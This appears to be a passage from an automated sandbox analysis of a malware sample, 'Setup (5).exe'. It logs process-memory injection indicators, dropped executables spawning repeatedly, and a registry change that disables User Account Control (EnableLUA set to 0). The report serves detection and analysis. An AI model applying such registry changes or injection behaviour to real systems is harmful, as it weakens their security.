Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found
Token: SeShutdownPrivilege	3208	Process not Found
Token: SeCreatePagefilePrivilege	3208	Process not Found

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
6828	6EC3.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3208	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 5072 wrote to memory of 3832	5072	Setup (5).exe	78
PID 5072 wrote to memory of 3832	5072	Setup (5).exe	78
PID 5072 wrote to memory of 3832	5072	Setup (5).exe	78
PID 5072 wrote to memory of 4576	5072	Setup (5).exe	79
PID 5072 wrote to memory of 4576	5072	Setup (5).exe	79
PID 5072 wrote to memory of 4576	5072	Setup (5).exe	79
PID 5072 wrote to memory of 4564	5072	Setup (5).exe	82
PID 5072 wrote to memory of 4564	5072	Setup (5).exe	82
PID 5072 wrote to memory of 4564	5072	Setup (5).exe	82
PID 5072 wrote to memory of 4856	5072	Setup (5).exe	80
PID 5072 wrote to memory of 4856	5072	Setup (5).exe	80
PID 5072 wrote to memory of 4856	5072	Setup (5).exe	80
PID 5072 wrote to memory of 4560	5072	Setup (5).exe	81
PID 5072 wrote to memory of 4560	5072	Setup (5).exe	81
PID 5072 wrote to memory of 4560	5072	Setup (5).exe	81
PID 5072 wrote to memory of 2464	5072	Setup (5).exe	84
PID 5072 wrote to memory of 2464	5072	Setup (5).exe	84
PID 5072 wrote to memory of 1532	5072	Setup (5).exe	85
PID 5072 wrote to memory of 1532	5072	Setup (5).exe	85
PID 5072 wrote to memory of 1532	5072	Setup (5).exe	85
PID 5072 wrote to memory of 3104	5072	Setup (5).exe	86
PID 5072 wrote to memory of 3104	5072	Setup (5).exe	86
PID 5072 wrote to memory of 3104	5072	Setup (5).exe	86
PID 5072 wrote to memory of 5056	5072	Setup (5).exe	90
PID 5072 wrote to memory of 5056	5072	Setup (5).exe	90
PID 5072 wrote to memory of 5056	5072	Setup (5).exe	90
PID 5072 wrote to memory of 1708	5072	Setup (5).exe	83
PID 5072 wrote to memory of 1708	5072	Setup (5).exe	83
PID 5072 wrote to memory of 1708	5072	Setup (5).exe	83
PID 5072 wrote to memory of 3880	5072	Setup (5).exe	87
PID 5072 wrote to memory of 3880	5072	Setup (5).exe	87
PID 5072 wrote to memory of 3880	5072	Setup (5).exe	87
PID 5072 wrote to memory of 5076	5072	Setup (5).exe	88
PID 5072 wrote to memory of 5076	5072	Setup (5).exe	88
PID 5072 wrote to memory of 5076	5072	Setup (5).exe	88
PID 5072 wrote to memory of 5084	5072	Setup (5).exe	89
PID 5072 wrote to memory of 5084	5072	Setup (5).exe	89
PID 5072 wrote to memory of 5084	5072	Setup (5).exe	89
PID 5072 wrote to memory of 3680	5072	Setup (5).exe	92
PID 5072 wrote to memory of 3680	5072	Setup (5).exe	92
PID 5072 wrote to memory of 3680	5072	Setup (5).exe	92
PID 5072 wrote to memory of 3568	5072	Setup (5).exe	98
PID 5072 wrote to memory of 3568	5072	Setup (5).exe	98
PID 5072 wrote to memory of 5044	5072	Setup (5).exe	125
PID 5072 wrote to memory of 5044	5072	Setup (5).exe	125
PID 5072 wrote to memory of 5044	5072	Setup (5).exe	125
PID 5072 wrote to memory of 3388	5072	Setup (5).exe	186
PID 5072 wrote to memory of 3388	5072	Setup (5).exe	186
PID 5072 wrote to memory of 3388	5072	Setup (5).exe	186
PID 5072 wrote to memory of 4192	5072	Setup (5).exe	96
PID 5072 wrote to memory of 4192	5072	Setup (5).exe	96
PID 5072 wrote to memory of 4192	5072	Setup (5).exe	96
PID 5072 wrote to memory of 4848	5072	Setup (5).exe	100
PID 5072 wrote to memory of 4848	5072	Setup (5).exe	100
PID 5072 wrote to memory of 4848	5072	Setup (5).exe	100
PID 5072 wrote to memory of 1560	5072	Setup (5).exe	101
PID 5072 wrote to memory of 1560	5072	Setup (5).exe	101
PID 5072 wrote to memory of 1560	5072	Setup (5).exe	101
PID 5072 wrote to memory of 3980	5072	Setup (5).exe	93
PID 5072 wrote to memory of 3980	5072	Setup (5).exe	93
PID 5072 wrote to memory of 3856	5072	Setup (5).exe	97
PID 5072 wrote to memory of 3856	5072	Setup (5).exe	97
PID 5072 wrote to memory of 3856	5072	Setup (5).exe	97
PID 5072 wrote to memory of 4044	5072	Setup (5).exe	94

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	jgs2UAwTKbisdt4bOkhAPSid.exe

C:\Users\Admin\AppData\Local\Temp\Setup (5).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (5).exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5072
- C:\Users\Admin\Documents\uJ4wk2sRBUl7N1C2coIQY4qb.exe
  "C:\Users\Admin\Documents\uJ4wk2sRBUl7N1C2coIQY4qb.exe"
  2⤵
  - Executes dropped EXE
  PID:3832
- C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
  "C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:4576
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    - Executes dropped EXE
    PID:1064
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    - Executes dropped EXE
    PID:3452
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    - Executes dropped EXE
    PID:5588
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    - Executes dropped EXE
    PID:5576
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    - Executes dropped EXE
    PID:2964
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    - Executes dropped EXE
    PID:5372
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    - Executes dropped EXE
    PID:4360
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:2876
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:2212
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4040
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:3292
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4200
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6536
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6912
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:916
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6532
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6748
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6748 -s 28
      4⤵
      Program crash
      PID:6160
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:5288
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4352
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:3648
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:1304
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:5540
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6124
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:5460
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6616
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:1116
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7496
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7780
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8124
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:448
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6876
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:1640
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7768
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7492
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7592
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6808
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8628
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9112
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8388
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8240
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8980
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7640
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7096
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:5548
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:3656
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:508
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    PID:6160
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4172
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4624
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8360
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6260
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7240
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8224
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:500
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8900
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8932
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7844
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8828
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4080
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:2696
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8396
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:5248
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6688
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7236
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:3032
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:3964
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:5272
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7972
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9048
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6024
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8652
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:1400
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:5036
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:2580
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:5404
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4804
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7896
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8444
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6324
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7460
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7892
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:5580
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8996
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7080
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8008
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:1032
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8744
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7316
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7908
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7056
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:2532
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7752
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6612
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:2708
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8368
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8528
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7204
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    - Executes dropped EXE
    PID:5736
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4552
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:3388
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:7776
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:5508
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:8584
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:2780
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:3672
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:4960
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:1236
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10112
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10076
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:2584
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:5152
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5152 -s 28
      4⤵
      Loads dropped DLL
      Drops file in Program Files directory
      Program crash
      PID:5332
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:6584
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:5224
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:9076
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10384
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10488
- - C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    C:\Users\Admin\Documents\BxDaHyAYlcwOccGxE4pXqU5I.exe
    3⤵
    PID:10572
